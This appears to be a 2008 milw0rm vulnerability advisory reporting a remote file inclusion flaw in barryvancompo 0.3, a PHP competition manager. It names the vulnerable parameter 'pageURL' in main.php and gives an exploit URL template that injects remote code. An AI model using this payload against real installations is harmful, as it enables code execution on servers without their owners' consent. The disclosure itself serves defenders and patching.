26 lines
No EOL
1 KiB
Text
26 lines
No EOL
1 KiB
Text
--==+================================================================================+==--
|
|
--==+ barryvancompo-0.3 Remote File Inclusion +==--
|
|
--==+================================================================================+==--
|
|
|
|
Author: MhZ91
|
|
Title: barryvancompo-0.3 Remote File Inclusion
|
|
Download: http://sourceforge.net/projects/barryvancompo/
|
|
Bug: Remote File Inclusion
|
|
Info: The barryvan compo manager is a PHP, Smarty and MySQL-based system for running, organising, and maintaining competitions. It is particularly designed for use within the computer music "scene".
|
|
Visit: http://www.inj3ct-it.org
|
|
|
|
[*]----------------------------------------------------------
|
|
|
|
barryvancompo-0.3 present a variable "pageURL" not definited in this file
|
|
|
|
main.php
|
|
(and all files require it)
|
|
|
|
we can exploit it by the variable "pageURL", for example
|
|
|
|
http://www.example.com/main.php?pageURL=[Evil_Code]
|
|
|
|
|
|
[*]----------------------------------------------------------
|
|
|
|
# milw0rm.com [2008-02-28] |